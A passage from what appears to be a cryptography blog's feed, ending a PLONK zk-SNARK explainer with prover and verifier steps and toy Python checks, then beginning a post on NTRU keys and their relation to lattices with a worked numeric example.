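a_blinded = poly_add(poly_mul([b0, b1], z_H), a)

H = [pow(W, k, P) for k in range(N)]
# the added term vanishes on H, so the values at H are untouched...
assert all(poly_eval(a_blinded, h) == poly_eval(a, h) for h in H)
# ...but outside H the polynomials disagree (b0 + b1·x kills at most one x)
assert any(poly_eval(a_blinded, x) != poly_eval(a, x) for x in (2, 3))
```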
&lt;h3 id=&quot;linearization-trick&quot;&gt;Linearization trick&lt;&#x2F;h3&gt;
&lt;p&gt;This is an optimization in PLONK to reduce the number of checks of the verifier.&lt;&#x2F;p&gt;
&lt;p&gt;One of the primary checks in PLONK boils down to checking that $p(\zeta) = z_H(\zeta) t(\zeta)$, with $p$ some polynomial that looks like $p = a q_L + b q_R + ab q_M + \cdots$, and so on. In particular, the verifier needs to get the value $p(\zeta)$ from somewhere.&lt;&#x2F;p&gt;
&lt;p&gt;For the sake of simplicity, in this section, assume $p$ is exactly $a q_L + bq_R$. Only $a$ and $b$ are secret to the prover; the polynomials $q_L$ and $q_R$ are known to the verifier. The verifier will already have the commitments $[a], [b], [q_L]$ and $[q_R]$. So the prover could send just $a(\zeta)$, $b(\zeta)$ along with their opening proofs and let the verifier compute by himself $q_L(\zeta)$ and $q_R(\zeta)$. Then with all these values the verifier could compute $p(\zeta) = a(\zeta)q_L(\zeta) + b(\zeta)q_R(\zeta)$. And also use his commitments to validate the opening proofs of $a(\zeta)$ and $b(\zeta)$.&lt;&#x2F;p&gt;
&lt;p&gt;This has the problem that computing $q_L(\zeta)$ and $q_R(\zeta)$ is expensive for the verifier. Instead, the prover can save him this work by sending $q_L(\zeta), q_R(\zeta)$ along with opening proofs. Since the verifier will have the commitments $[q_L]$ and $[q_R]$ beforehand, he can check that the prover is not cheating and cheaply be convinced that the claimed values are $q_L(\zeta)$ and $q_R(\zeta)$. This is much better. It involves the check of four opening proofs and the computation of $p(\zeta)$ from the values received from the prover. But it can be further improved as follows.&lt;&#x2F;p&gt;
&lt;p&gt;As before, the prover sends $a(\zeta), b(\zeta)$ along with their opening proofs. She constructs the polynomial $f = a(\zeta)q_L + b(\zeta)q_R$. She sends the value $f(\zeta)$ along with an opening proof of it. Notice that the value of $f(\zeta)$ is exactly $p(\zeta)$. The verifier can compute by himself $[f]$ as $a(\zeta)[q_L] + b(\zeta)[q_R]$. The verifier has everything to check all three openings and is convinced that the claimed value $f(\zeta)$ is true, and this value is $p(\zeta)$. So this means no more work for the verifier. And the whole thing got reduced to three openings.&lt;&#x2F;p&gt;
&lt;p&gt;This is called the linearization trick. The polynomial $f$ is called the &lt;em&gt;linearization&lt;&#x2F;em&gt; of $p$.&lt;&#x2F;p&gt;
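&lt;p&gt;The identity behind the trick, $f(\zeta) = p(\zeta)$, can be checked numerically. A sketch for the simplified case $p = a q_L + b q_R$, with hypothetical toy polynomials:&lt;&#x2F;p&gt;

```python
# Numeric sketch of the linearization trick for p = a·qL + b·qR: the
# partially evaluated f = a(ζ)·qL + b(ζ)·qR satisfies f(ζ) = p(ζ), and its
# commitment is a(ζ)[qL] + b(ζ)[qR] under any additively homomorphic PCS.
P = 97

def poly_eval(f, x):
    acc = 0
    for c in reversed(f):
        acc = (acc * x + c) % P
    return acc

a, b = [3, 1, 4], [1, 5, 9]         # prover's secret polynomials
qL, qR = [2, 7], [1, 8, 2]          # selectors known to both parties
zeta = 23

a_bar, b_bar = poly_eval(a, zeta), poly_eval(b, zeta)
# linearization: f = a(ζ)·qL + b(ζ)·qR, built coefficient-wise
n = max(len(qL), len(qR))
qL_p, qR_p = qL + [0] * (n - len(qL)), qR + [0] * (n - len(qR))
f = [(a_bar * cl + b_bar * cr) % P for cl, cr in zip(qL_p, qR_p)]

# p(ζ) = a(ζ)qL(ζ) + b(ζ)qR(ζ) must match f(ζ)
p_zeta = (a_bar * poly_eval(qL, zeta) + b_bar * poly_eval(qR, zeta)) % P
assert poly_eval(f, zeta) == p_zeta
```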
&lt;h2 id=&quot;setup&quot;&gt;Setup&lt;&#x2F;h2&gt;
&lt;p&gt;There’s a one-time setup phase to compute some values common to any execution and proof of the particular circuit. Precisely, the following commitments are calculated and published.&lt;br &#x2F;&gt;
$$\left[ q_L \right] , \left[ q_R \right] , \left[ q_M \right] , \left[ q_O \right] , \left[ q_C \right] , \left[ S_{ \sigma 1} \right] , \left[ S_{ \sigma 2} \right] , \left[ S_{ \sigma 3} \right]$$&lt;&#x2F;p&gt;
&lt;h2 id=&quot;proving-algorithm&quot;&gt;Proving algorithm&lt;&#x2F;h2&gt;
&lt;p&gt;Next, we describe the proving algorithm for a program of size $N$ that includes public inputs. Let $\omega$ be a primitive $N$-th root of unity. Let $H = \{1, \omega, \omega^2, \dots, \omega^{N-1} \}$. Define $Z_H := X^N - 1$.&lt;&#x2F;p&gt;
&lt;p&gt;Assume the eight polynomials of common preprocessed input are already given.&lt;&#x2F;p&gt;
&lt;p&gt;The prover computes the trace matrix $T$ as described in the first sections. That means the first rows correspond to the public inputs. It should be an $N \times 3$ matrix.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;round-1&quot;&gt;Round 1&lt;&#x2F;h3&gt;
&lt;p&gt;Add to the transcript the following:&lt;br &#x2F;&gt;
$$[S_{\sigma1}] , [S_{\sigma2}] , [S_{\sigma3} ] , [q_L] , [q_R] , [q_M] , [q_O] , [q_C]$$&lt;&#x2F;p&gt;
&lt;p&gt;Compute polynomials $a’,b’,c’$ as the interpolation polynomials of the columns of $T$ at the domain $H$.&lt;br &#x2F;&gt;
Sample random $b_1, b_2, b_3, b_4, b_5, b_6$.&lt;br &#x2F;&gt;
Let&lt;&#x2F;p&gt;
&lt;p&gt;$a := (b_1X + b_2)Z_H + a’$&lt;&#x2F;p&gt;
&lt;p&gt;$b := (b_3X + b_4)Z_H + b’$&lt;&#x2F;p&gt;
&lt;p&gt;$c := (b_5X + b_6)Z_H + c’$&lt;&#x2F;p&gt;
&lt;p&gt;Compute $[a], [b], [c]$ and add them to the transcript.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;round-2&quot;&gt;Round 2&lt;&#x2F;h3&gt;
&lt;p&gt;Sample $\beta, \gamma$ from the transcript.&lt;&#x2F;p&gt;
&lt;p&gt;Let $z_0 = 1$ and, writing $a_k, b_k, c_k$ for the entries $A_k, B_k, C_k$ of the trace columns, define recursively for $0\leq k &amp;lt; N$.&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
z_{k+1} = z_k \frac{(a_k + \beta\omega^k + \gamma)(b_k + \beta\omega^k k_1 + \gamma)(c_k + \beta\omega^k k_2 + \gamma)}{(a_k + \beta S_{\sigma1}(\omega^k) + \gamma)(b_k + \beta S_{\sigma2}(\omega^k) + \gamma)(c_k + \beta S_{\sigma3}(\omega^k) + \gamma)}&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;Compute the polynomial $z’$ as the interpolation polynomial at the domain $H$ of the values $(z_0, \dots, z_{N-1})$.&lt;&#x2F;p&gt;
&lt;p&gt;Sample random values $b_7, b_8, b_9$ and let $z = (b_7X^2 + b_8X + b_9)Z_H + z’$.&lt;&#x2F;p&gt;
&lt;p&gt;Compute $[z]$ and add it to the transcript.&lt;&#x2F;p&gt;
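&lt;p&gt;A toy run of this recursion (hypothetical field and trace values, the identity permutation, and no blinding) illustrates the telescoping property: when the copy constraints hold, the running product wraps around to $z_N = 1$.&lt;&#x2F;p&gt;

```python
# Toy run of Round 2's running product (hypothetical instance, before
# blinding): z_0 = 1 and z_{k+1} = z_k * num_k / den_k as in the formula
# above. With the identity permutation, num_k == den_k, so z stays at 1
# and in particular wraps around to z_N = 1.
P = 13
N = 4
W = 8                               # primitive 4th root of unity mod 13
K1, K2 = 2, 3                       # coset shifts (hypothetical choices)

# a trace whose permutation is the identity: S_sigma_j(w^k) = shift * w^k
A, B, C = [3, 1, 4, 1], [5, 9, 2, 6], [8, 10, 6, 7]
def s1(k): return pow(W, k, P)
def s2(k): return K1 * pow(W, k, P) % P
def s3(k): return K2 * pow(W, k, P) % P

beta, gamma = 7, 11
z = [1]
for k in range(N):
    wk = pow(W, k, P)
    num = (A[k] + beta*wk + gamma) * (B[k] + beta*wk*K1 + gamma) \
          * (C[k] + beta*wk*K2 + gamma) % P
    den = (A[k] + beta*s1(k) + gamma) * (B[k] + beta*s2(k) + gamma) \
          * (C[k] + beta*s3(k) + gamma) % P
    z.append(z[-1] * num * pow(den, P - 2, P) % P)   # divide via Fermat

assert z[0] == 1 and z[N] == 1      # the product telescopes back to 1
```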
&lt;h3 id=&quot;round-3&quot;&gt;Round 3&lt;&#x2F;h3&gt;
&lt;p&gt;Sample $\alpha$ from the transcript.&lt;&#x2F;p&gt;
&lt;p&gt;Let $pi$ be the interpolation of the public input matrix $PI$ at the domain $H$.&lt;&#x2F;p&gt;
&lt;p&gt;Let&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
\begin{aligned}&lt;br &#x2F;&gt;
p_1 &amp;amp;= aq_L + bq_R + abq_M + cq_O + q_C + pi \newline&lt;br &#x2F;&gt;
p_2 &amp;amp;= (a + \beta X + \gamma)(b + \beta k_1 X + \gamma)(c + \beta k_2 X + \gamma)z - (a + \beta S_{\sigma1} + \gamma)(b + \beta S_{\sigma2} + \gamma)(c + \beta S_{\sigma3} + \gamma)z(\omega X)\newline&lt;br &#x2F;&gt;
p_3 &amp;amp;= (z - 1)L_1&lt;br &#x2F;&gt;
\end{aligned}&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;and define $p = p_1 + \alpha p_2 + \alpha^2 p_3$. Compute $t$ such that $p = t Z_H$. Write $t = t_{lo}’ + X^{N+2} t_{mid}’ + X^{2(N+2)} t_{hi}’$ with $t_{lo} ’, t_{mid} ’$ and $t_{hi} ’$ polynomials of degree at most $N+1$.&lt;&#x2F;p&gt;
&lt;p&gt;Sample random $b_{10}, b_{11}$ and define&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
\begin{aligned}&lt;br &#x2F;&gt;
t_{lo} &amp;amp;= t_{lo}’ + b_{10}X^{N+2} \newline&lt;br &#x2F;&gt;
t_{mid} &amp;amp;= t_{mid}’ - b_{10} + b_{11}X^{N+2} \newline&lt;br &#x2F;&gt;
t_{hi} &amp;amp;= t_{hi}’ - b_{11}&lt;br &#x2F;&gt;
\end{aligned}&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;Compute $[t_{lo}] , [t_{mid} ] , [t_{hi} ]$ and add them to the transcript.&lt;&#x2F;p&gt;
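&lt;p&gt;The masking terms $b_{10}$ and $b_{11}$ cancel between consecutive chunks, so the split pieces still recombine to $t$ at any point. A quick numeric check with hypothetical toy values:&lt;&#x2F;p&gt;

```python
# Check that the masking of the split t does not change the recombination:
# the b10, b11 terms cancel between consecutive chunks, so
# t_lo + x^(N+2)·t_mid + x^(2(N+2))·t_hi still evaluates to t(x) everywhere.
P, N = 97, 4
D = N + 2

def poly_eval(f, x):
    acc = 0
    for c in reversed(f):
        acc = (acc * x + c) % P
    return acc

t = list(range(1, 3 * D + 1))            # a stand-in for t, little-endian
t_lo, t_mid, t_hi = t[:D], t[D:2*D], t[2*D:]
b10, b11 = 17, 29

# blind as in Round 3: add b·X^(N+2) to one chunk, subtract b from the next
t_lo_b  = t_lo + [b10]
t_mid_b = [(t_mid[0] - b10) % P] + t_mid[1:] + [b11]
t_hi_b  = [(t_hi[0] - b11) % P] + t_hi[1:]

for zeta in (5, 23, 42):
    combined = (poly_eval(t_lo_b, zeta)
                + pow(zeta, D, P) * poly_eval(t_mid_b, zeta)
                + pow(zeta, 2 * D, P) * poly_eval(t_hi_b, zeta)) % P
    assert combined == poly_eval(t, zeta)
```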
&lt;h3 id=&quot;round-4&quot;&gt;Round 4&lt;&#x2F;h3&gt;
&lt;p&gt;Sample $\zeta$ from the transcript.&lt;&#x2F;p&gt;
&lt;p&gt;Compute $\bar a = a(\zeta), \bar b = b(\zeta), \bar c = c(\zeta), \bar s_{\sigma1} = S_{\sigma1}(\zeta), \bar s_{\sigma2} = S_{\sigma2}(\zeta), \bar z_\omega = z(\zeta\omega)$ and add them to the transcript.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;round-5&quot;&gt;Round 5&lt;&#x2F;h3&gt;
&lt;p&gt;Sample $\upsilon$ from the transcript.&lt;&#x2F;p&gt;
&lt;p&gt;Let&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
\begin{aligned}&lt;br &#x2F;&gt;
\hat p_{nc1} &amp;amp;= \bar aq_L + \bar bq_R + \bar a\bar bq_M + \bar cq_O + q_C \newline&lt;br &#x2F;&gt;
\hat p_{nc2} &amp;amp;=(\bar a + \beta\zeta + \gamma)(\bar b + \beta k_1\zeta + \gamma)(\bar c + \beta k_2\zeta + \gamma)z - (\bar a + \beta \bar s_{\sigma1} + \gamma)(\bar b + \beta \bar s_{\sigma2} + \gamma)\beta \bar z_\omega S_{\sigma3} \newline&lt;br &#x2F;&gt;
\hat p_{nc3} &amp;amp;= L_1(\zeta) z&lt;br &#x2F;&gt;
\end{aligned}&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;Define&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
\begin{aligned}&lt;br &#x2F;&gt;
p_{nc} &amp;amp;= \hat p_{nc1} + \alpha \hat p_{nc2} + \alpha^2 \hat p_{nc3} \newline&lt;br &#x2F;&gt;
t_{\text{partial}} &amp;amp;= t_{lo} + \zeta^{N+2}t_{mid} + \zeta^{2(N+2)}t_{hi}&lt;br &#x2F;&gt;
\end{aligned}&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;The subscript $nc$ stands for “nonconstant,” as it is the part of the linearization of $p$ with nonconstant factors. The subscript “partial” indicates that it is a partial evaluation of $t$ at $\zeta$. Partial means that only some of the powers of $X$ are replaced by powers of $\zeta$. So in particular $t_{\text{partial}}(\zeta) = t(\zeta)$.&lt;&#x2F;p&gt;
&lt;p&gt;Let $\pi_{\text{batch}}$ be the opening proof at $\zeta$ of the polynomial $f_{\text{batch}}$ defined as&lt;br &#x2F;&gt;
$$t_{\text{partial}} +\upsilon p_{nc} + \upsilon^2 a + \upsilon^3 b + \upsilon^4 c + \upsilon^5 S_{\sigma1} + \upsilon^6 S_{\sigma2}$$&lt;&#x2F;p&gt;
&lt;p&gt;Let $\pi_{\text{single}}$ be the opening proof at $\zeta\omega$ of the polynomial $z$.&lt;&#x2F;p&gt;
&lt;p&gt;Compute $\bar p_{nc} := p_{nc}(\zeta)$ and $\bar t = t(\zeta)$.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;proof&quot;&gt;Proof&lt;&#x2F;h3&gt;
&lt;p&gt;The proof is:&lt;br &#x2F;&gt;
$$[a], [b], [c], [z], [t_{lo}], [t_{mid}], [t_{hi}], \bar a, \bar b, \bar c, \bar s_{\sigma1}, \bar s_{\sigma 2}, \bar z_\omega, \pi_{\text{batch}}, \pi_{\text{single}}, \bar p_{nc}, \bar t$$&lt;&#x2F;p&gt;
&lt;h2 id=&quot;verification-algorithm&quot;&gt;Verification algorithm&lt;&#x2F;h2&gt;
&lt;h3 id=&quot;transcript-initialization&quot;&gt;Transcript initialization&lt;&#x2F;h3&gt;
&lt;p&gt;The first step is to initialize the transcript the same way the prover did, adding to it the following elements.&lt;br &#x2F;&gt;
$$[S_{\sigma1} ], [S_{\sigma2} ], [S_{\sigma3} ], [q_L], [q_R], [q_M], [q_O], [q_C]$$&lt;&#x2F;p&gt;
&lt;h3 id=&quot;extraction-of-values-and-commitments&quot;&gt;Extraction of values and commitments&lt;&#x2F;h3&gt;
&lt;h4 id=&quot;challenges&quot;&gt;Challenges&lt;&#x2F;h4&gt;
&lt;p&gt;Firstly, the verifier needs to compute all the challenges. For that, he follows these steps:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Add $[a], [b], [c]$ to the transcript.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Sample two challenges $\beta, \gamma$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Add $[z]$ to the transcript.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Sample a challenge $\alpha$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Add $[t_{lo} ], [t_{mid} ], [t_{hi} ]$ to the transcript.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Sample a challenge $\zeta$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Add $\bar a, \bar b, \bar c, \bar s_{\sigma 1}, \bar s_{\sigma 2}, \bar z_\omega$ to the transcript.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Sample a challenge $\upsilon$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h4 id=&quot;compute-pi-zeta&quot;&gt;Compute $pi(\zeta)$&lt;&#x2F;h4&gt;
&lt;p&gt;The verifier also needs to compute a few values from this data. First, he computes the $PI$ matrix with the public inputs and outputs. He needs to compute $pi(\zeta)$, where $pi$ is the interpolation of $PI$ at the domain $H$. But he doesn’t need to compute $pi$ itself. He can instead compute $pi(\zeta)$ as&lt;br &#x2F;&gt;
$$ \sum_{i=0}^n L_i(\zeta) PI_i,$$&lt;br &#x2F;&gt;
where $n$ is the number of public inputs and $L_i$ is the Lagrange basis at the domain $H$.&lt;&#x2F;p&gt;
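&lt;p&gt;A sketch of this shortcut over a toy field (hypothetical parameters, $n = 2$ public inputs), computing the $L_i(\zeta)$ straight from the definition of the Lagrange basis:&lt;&#x2F;p&gt;

```python
# Sketch of the verifier's shortcut for pi(ζ): instead of interpolating PI,
# sum L_i(ζ)·PI_i directly; since PI_i = 0 for i >= n, only n terms matter.
P, N, W = 13, 4, 8                # 8 is a primitive 4th root of unity mod 13
H = [pow(W, k, P) for k in range(N)]

def lagrange_at(i, x):
    """L_i(x) for the Lagrange basis over H, from the definition."""
    num = den = 1
    for j in range(N):
        if j != i:
            num = num * (x - H[j]) % P
            den = den * (H[i] - H[j]) % P
    return num * pow(den, P - 2, P) % P

PI = [5, 9, 0, 0]                 # n = 2 public inputs, padded with zeros
zeta = 6                          # a challenge outside H

# sanity: the same basis interpolates PI on the whole domain
assert all(sum(lagrange_at(i, H[k]) * PI[i] for i in range(N)) % P == PI[k]
           for k in range(N))
# the verifier's sum needs only the first n terms, since PI_i = 0 for i >= n
shortcut = sum(lagrange_at(i, zeta) * PI[i] for i in range(2)) % P
full = sum(lagrange_at(i, zeta) * PI[i] for i in range(N)) % P
assert shortcut == full
```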
&lt;h4 id=&quot;compute-claimed-values-p-zeta-and-t-zeta&quot;&gt;Compute claimed values $p(\zeta)$ and $t(\zeta)$&lt;&#x2F;h4&gt;
&lt;p&gt;He computes $\bar p_{c} := pi(\zeta) - \alpha \bar z_\omega (\bar c + \gamma) (\bar a + \beta \bar s_{\sigma1} + \gamma) (\bar b + \beta \bar s_{\sigma2} + \gamma) - \alpha^2 L_1(\zeta)$&lt;&#x2F;p&gt;
&lt;p&gt;This is the &lt;em&gt;constant&lt;&#x2F;em&gt; part of the linearization of $p$. So adding it to what the prover claims to be $\bar p_{nc}$, he obtains&lt;br &#x2F;&gt;
$$p(\zeta) = \bar p_{c} + \bar p_{nc}$$&lt;&#x2F;p&gt;
&lt;p&gt;Concerning $t(\zeta)$, this is simply the value $\bar t$ sent by the prover.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;compute-t-text-partial-and-p-nc&quot;&gt;Compute $[t_{\text{partial}}]$ and $[p_{nc}]$&lt;&#x2F;h4&gt;
&lt;p&gt;He computes these from the commitments in the proof as follows:&lt;br &#x2F;&gt;
$$ [t_{\text{partial}}] = [t_{lo}] + \zeta^{N+2}[t_{mid}] + \zeta^{2(N+2)}[t_{hi}] $$&lt;&#x2F;p&gt;
&lt;p&gt;For $[p_{nc}]$, first compute&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
\begin{aligned}&lt;br &#x2F;&gt;
\left[\hat p_{nc1}\right] &amp;amp;= \bar a[q_L] + \bar b[q_R] + (\bar a\bar b)[q_M] + \bar c[q_O] + [q_C] \newline&lt;br &#x2F;&gt;
[\hat p_{nc2}] &amp;amp;= (\bar a + \beta\zeta + \gamma)(\bar b + \beta k_1\zeta + \gamma)(\bar c + \beta k_2\zeta + \gamma)[z] - (\bar a + \beta \bar s_{\sigma1} + \gamma)(\bar b + \beta \bar s_{\sigma2} + \gamma)\beta \bar z_\omega [S_{\sigma3}] \newline&lt;br &#x2F;&gt;
[\hat p_{nc3}] &amp;amp;= L_1(\zeta)[z]&lt;br &#x2F;&gt;
\end{aligned}&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;Then $[p_{nc}] = [\hat p_{nc1}] + \alpha[\hat p_{nc2}] + \alpha^2[\hat p_{nc3}]$.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;compute-claimed-value-f-text-batch-zeta-and-f-text-batch&quot;&gt;Compute claimed value $f_{\text{batch}}(\zeta)$ and $[f_{\text{batch}}]$&lt;&#x2F;h4&gt;
&lt;p&gt;Compute $f_{\text{batch}}(\zeta)$ as&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
f_{\text{batch}}(\zeta) =&lt;br &#x2F;&gt;
\bar t +\upsilon \bar p_{nc} + \upsilon^2 \bar a + \upsilon^3 \bar b + \upsilon^4 \bar c + \upsilon^5 \bar s_{\sigma1} + \upsilon^6 \bar s_{\sigma2}&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;Also, the commitment of the polynomial $f_{\text{batch}}$ is&lt;br &#x2F;&gt;
$$\left[f_{\text{batch}}\right] = \left[ t_{\text{partial}} \right] +\upsilon [p_{nc}] + \upsilon^2 [a] + \upsilon^3 [b] + \upsilon^4 [c] + \upsilon^5 [S_{\sigma1}] + \upsilon^6 [S_{\sigma2}]$$&lt;&#x2F;p&gt;
&lt;h3 id=&quot;proof-check&quot;&gt;Proof check&lt;&#x2F;h3&gt;
&lt;p&gt;Now the verifier has all the necessary values to proceed with the checks.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Check that $p(\zeta)$ equals $(\zeta^N - 1)t(\zeta)$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Verify the opening of $f_{\text{batch}}$ at $\zeta$. That is, check that $\text{Verify}([f_{\text{batch}}], \pi_{\text{batch}}, \zeta, f_{\text{batch}}(\zeta))$ outputs _Accept_.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Verify the opening of $z$ at $\zeta\omega$. That is, check the validity of the proof $\pi_{\text{single}}$ using the commitment $[z]$ and the value $\bar z_\omega$.  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;That is, check that $\text{Verify}(\left[z\right] , \pi_{\text{single}}, \zeta\omega, \bar z_\omega )$ outputs &lt;em&gt;Accept&lt;&#x2F;em&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;If all checks pass, he outputs &lt;em&gt;Accept&lt;&#x2F;em&gt;. Otherwise, outputs &lt;em&gt;Reject&lt;&#x2F;em&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;In this post, we covered the working principles and protocol basics of PLONK, a commonly used ZK-SNARK. We saw how to transform the computation into a group of polynomial constraints over the elements of the computation trace. Then, we saw how to enforce these constraints and how to prove the correct wiring, using a permutation argument. In an upcoming post, we will be covering optimizations to the basic protocol, including custom gates, look-up tables, folding schemes and other commitment schemes.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>How to get a true headache: brute forcing NTRU</title>
          <pubDate>Mon, 24 Apr 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/how-to-get-a-true-headache-brute-forcing-ntru/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/how-to-get-a-true-headache-brute-forcing-ntru/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/how-to-get-a-true-headache-brute-forcing-ntru/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;Lattice cryptography is a type of cryptographic scheme that relies on the hardness of certain computational problems related to lattices, which are geometric structures formed by repeating a pattern of points in space. Lattice-based cryptography is considered a promising candidate for post-quantum cryptography, as it is believed to be resistant to attacks by quantum computers.&lt;&#x2F;p&gt;
&lt;p&gt;The NTRU (N-th degree Truncated polynomial Ring Units) cryptosystem is a lattice-based public-key cryptosystem that was introduced in 1996. It is based on the properties of a specific type of lattice called an ideal lattice, a particular type constructed from the ideals of a polynomial ring. The NTRU cryptosystem uses polynomials with small coefficients to generate public and private keys, which are then used for encryption and decryption. For more details, see our &lt;a href=&quot;&#x2F;i-want-to-break-free-from-lattice-based-cryptography-but-not-even-a-quantum-computer-can-help-me&#x2F;&quot;&gt;previous post&lt;&#x2F;a&gt;. In this post, we will explain how finding the private key is equivalent to finding short vectors on a lattice and give bounds on brute-force attacks.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;the-public-and-private-keys-in-ntru&quot;&gt;The public and private keys in NTRU&lt;&#x2F;h2&gt;
&lt;p&gt;In our &lt;a href=&quot;&#x2F;i-want-to-break-free-from-lattice-based-cryptography-but-not-even-a-quantum-computer-can-help-me&#x2F;&quot;&gt;previous post&lt;&#x2F;a&gt;, we discussed the NTRU encryption scheme. We now show how its keys are related to a specific lattice; the encryption and decryption processes are irrelevant for this purpose, hence they can be left aside.&lt;&#x2F;p&gt;
&lt;p&gt;Recall from our previous post the ring $R = \mathbb Z[X]&#x2F;(X^N - 1)$ and the ring $R_q = \mathbb Z_q[X]&#x2F;(X^N - 1)$. The private key in NTRU consists of two polynomials $f,g \in R$ whose coefficients are somehow &lt;em&gt;small&lt;&#x2F;em&gt; : they are allowed to be only equal to 0, 1, or -1. These are called &lt;em&gt;ternary&lt;&#x2F;em&gt; polynomials.&lt;&#x2F;p&gt;
&lt;p&gt;The polynomial $f$ must have an inverse $F \in R_q$. For example, let $N = 5, q = 37$ and&lt;br &#x2F;&gt;
$$&lt;br &#x2F;&gt;
f = 1 + x - x^2 + x^4.&lt;br &#x2F;&gt;
$$ Letting $F \in R$ be the polynomial given by&lt;br &#x2F;&gt;
$$&lt;br &#x2F;&gt;
F = 29x^4 + 35x^3 + 22x^2 + 12x + 32,&lt;br &#x2F;&gt;
$$ let’s show that $F$ is the inverse of $f$ in $R_q$.&lt;&#x2F;p&gt;
&lt;p&gt;Recall that the product in $R_q$ is explained in our previous post: we multiply as usual and replace every appearance of $x^N$ with $1$. Then in our example, we have that&lt;br &#x2F;&gt;
$$&lt;br &#x2F;&gt;
\begin{align*}&lt;br &#x2F;&gt;
fF &amp;amp; = 29x^8 + 35x^7 + 30x^6 + 6x^5 + 8x^3 + 2x^2 + 7x + 32 \newline&lt;br &#x2F;&gt;
&amp;amp; = (29+8)x^3 + (35+2)x^2 + (30+7) x + (6+32) \newline&lt;br &#x2F;&gt;
&amp;amp; = 37x^3 + 37x^2 + 37x + 38 \newline&lt;br &#x2F;&gt;
&amp;amp; = 1.&lt;br &#x2F;&gt;
\end{align*}&lt;br &#x2F;&gt;
$$ The last equality holds because $37 \equiv 0$ and $38 \equiv 1 \pmod{37}$. This example shows that the inverse of $f$ can have large coefficients modulo $q$, even though $f$ is small.&lt;&#x2F;p&gt;
&lt;p&gt;The public key is the polynomial $h \in R_q$ given by $h = Fg$. In our example, if we let&lt;br &#x2F;&gt;
$$&lt;br &#x2F;&gt;
g = x - x^3 - x^4&lt;br &#x2F;&gt;
$$ We have that&lt;br &#x2F;&gt;
$$&lt;br &#x2F;&gt;
h = 28x^4 + 35x^3 + 22x^2 + 12x + 32.&lt;br &#x2F;&gt;
$$ We see that though $h$ is constructed from ternary polynomials, it is far from being ternary.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;the-convolution-ring-revisited&quot;&gt;The convolution ring revisited&lt;&#x2F;h2&gt;
&lt;p&gt;By replacing every appearance of $x^N$ with 1, we can write every polynomial $h \in R$ as $h = h_0+\cdots+h_{N-1}x^{N-1}$. Moreover, we will identify the polynomial $h$ with the vector $\mathbf h = (h_0,\dots,h_{N-1})$.&lt;&#x2F;p&gt;
